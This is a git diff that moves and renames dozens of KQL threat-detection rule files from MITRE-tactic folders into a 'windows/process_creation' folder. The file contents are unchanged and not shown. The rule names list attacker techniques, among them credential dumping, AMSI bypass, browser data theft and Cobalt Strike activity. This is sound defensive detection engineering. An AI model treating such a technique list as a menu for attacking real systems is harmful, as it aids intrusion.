diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
rename to KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
rename to KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql
diff --git a/KQL/rules/Persistence/new_service_creation_using_powershell.kql b/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql
similarity index 100%
rename from KQL/rules/Persistence/new_service_creation_using_powershell.kql
rename to KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql
diff --git a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql b/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/new_service_creation_using_sc_exe.kql
rename to KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql
diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/new_user_created_via_net_exe.kql
rename to KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql
diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql
similarity index 100%
rename from KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql
rename to KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql
diff --git a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
similarity index 100%
rename from KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
rename to KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
diff --git a/KQL/rules/Discovery/nltest_exe_execution.kql b/KQL/rules/windows/process_creation/nltest_exe_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/nltest_exe_execution.kql
rename to KQL/rules/windows/process_creation/nltest_exe_execution.kql
diff --git a/KQL/rules/Defense Evasion/node_process_executions.kql b/KQL/rules/windows/process_creation/node_process_executions.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/node_process_executions.kql
rename to KQL/rules/windows/process_creation/node_process_executions.kql
diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql
similarity index 100%
rename from KQL/rules/Execution/nodejs_execution_of_javascript_file.kql
rename to KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql
diff --git a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql b/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql
similarity index 100%
rename from KQL/rules/Execution/non_interactive_powershell_process_spawned.kql
rename to KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql
diff --git a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql
similarity index 100%
rename from KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql
rename to KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql
diff --git a/KQL/rules/Discovery/notepad_password_files_discovery.kql b/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql
similarity index 100%
rename from KQL/rules/Discovery/notepad_password_files_discovery.kql
rename to KQL/rules/windows/process_creation/notepad_password_files_discovery.kql
diff --git a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql
rename to KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql
diff --git a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql b/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql
rename to KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql
diff --git a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql b/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql
similarity index 100%
rename from KQL/rules/Discovery/obfuscated_ip_download_activity.kql
rename to KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql
diff --git a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql b/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql
similarity index 100%
rename from KQL/rules/Discovery/obfuscated_ip_via_cli.kql
rename to KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
rename to KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql
rename to KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql
diff --git a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql
rename to KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql
diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
rename to KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql
diff --git a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql
rename to KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql
diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql
similarity index 100%
rename from KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql
rename to KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql
diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql
similarity index 100%
rename from KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql
rename to KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql
diff --git a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql
similarity index 100%
rename from KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql
rename to KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql
diff --git a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql
rename to KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql
diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql
rename to KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql
diff --git a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql
similarity index 100%
rename from KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql
rename to KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql
diff --git a/KQL/rules/Execution/perl_inline_command_execution.kql b/KQL/rules/windows/process_creation/perl_inline_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/perl_inline_command_execution.kql
rename to KQL/rules/windows/process_creation/perl_inline_command_execution.kql
diff --git a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql b/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/permission_check_via_accesschk_exe.kql
rename to KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql
diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
rename to KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql
similarity index 100%
rename from KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
rename to KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql
diff --git a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql b/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql
similarity index 100%
rename from KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql
rename to KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql
diff --git a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql b/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql
similarity index 100%
rename from KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql
rename to KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql
diff --git a/KQL/rules/Execution/php_inline_command_execution.kql b/KQL/rules/windows/process_creation/php_inline_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/php_inline_command_execution.kql
rename to KQL/rules/windows/process_creation/php_inline_command_execution.kql
diff --git a/KQL/rules/Defense Evasion/ping_hex_ip.kql b/KQL/rules/windows/process_creation/ping_hex_ip.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/ping_hex_ip.kql
rename to KQL/rules/windows/process_creation/ping_hex_ip.kql
diff --git a/KQL/rules/Discovery/pktmon_exe_execution.kql b/KQL/rules/windows/process_creation/pktmon_exe_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/pktmon_exe_execution.kql
rename to KQL/rules/windows/process_creation/pktmon_exe_execution.kql
diff --git a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql
similarity index 100%
rename from KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql
rename to KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql
diff --git a/KQL/rules/Impact/portable_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql
similarity index 100%
rename from KQL/rules/Impact/portable_gpg_exe_execution.kql
rename to KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql
diff --git a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql
similarity index 100%
rename from KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql
rename to KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql
diff --git a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql
similarity index 100%
rename from KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql
rename to KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql
diff --git a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql
rename to KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql
diff --git a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql
similarity index 100%
rename from KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql
rename to KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql
diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql
rename to KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql
diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql
rename to KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql
diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
rename to KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql
rename to KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql
rename to KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql
diff --git a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql
similarity index 100%
rename from KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql
rename to KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql
rename to KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql
diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql
rename to KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql
diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql
similarity index 100%
rename from KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql
rename to KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql
diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql
similarity index 100%
rename from KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql
rename to KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql
diff --git a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql
similarity index 100%
rename from KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql
rename to KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql
diff --git a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
rename to KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_browser_data_stealing.kql
rename to KQL/rules/windows/process_creation/potential_browser_data_stealing.kql
diff --git a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql b/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql
similarity index 100%
rename from KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql
rename to KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql
diff --git a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql
similarity index 100%
rename from KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql
rename to KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql
diff --git a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql
rename to KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql
rename to KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
rename to KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
diff --git a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql
similarity index 100%
rename from KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql
rename to KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql
diff --git a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql
diff --git a/KQL/rules/Execution/potential_cookies_session_hijacking.kql b/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql
similarity index 100%
rename from KQL/rules/Execution/potential_cookies_session_hijacking.kql
rename to KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
rename to KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql
rename to KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql
diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql
rename to KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql
diff --git a/KQL/rules/Impact/potential_crypto_mining_activity.kql b/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql
similarity index 100%
rename from KQL/rules/Impact/potential_crypto_mining_activity.kql
rename to KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql
diff --git a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql
similarity index 100%
rename from KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql
rename to KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql
diff --git a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql
rename to KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql
rename to KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
rename to KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql diff --git a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql rename to KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql diff --git a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql similarity index 100% rename from KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql rename to KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql rename to KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql 
diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql similarity index 100% rename from KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql rename to KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql rename to KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql diff --git a/KQL/rules/Execution/potential_dosfuscation_activity.kql b/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql similarity index 100% rename from KQL/rules/Execution/potential_dosfuscation_activity.kql rename to KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql diff --git a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql b/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql similarity index 100% rename from KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql rename to KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql diff --git a/KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql similarity index 100% rename from KQL/rules/Execution/potential_dropper_script_execution_via_wscript_cscript.kql rename to KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql 
diff --git a/KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_encoded_powershell_patterns_in_commandline.kql rename to KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql rename to KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql diff --git a/KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql similarity index 100% rename from KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql rename to KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql rename to KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql 
